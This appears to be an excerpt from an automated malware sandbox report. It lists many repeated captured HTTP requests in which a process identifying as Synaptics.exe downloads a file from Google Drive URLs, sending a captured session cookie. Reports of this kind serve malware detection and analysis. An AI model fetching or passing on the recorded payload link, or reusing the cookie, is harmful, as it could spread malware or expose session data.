                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
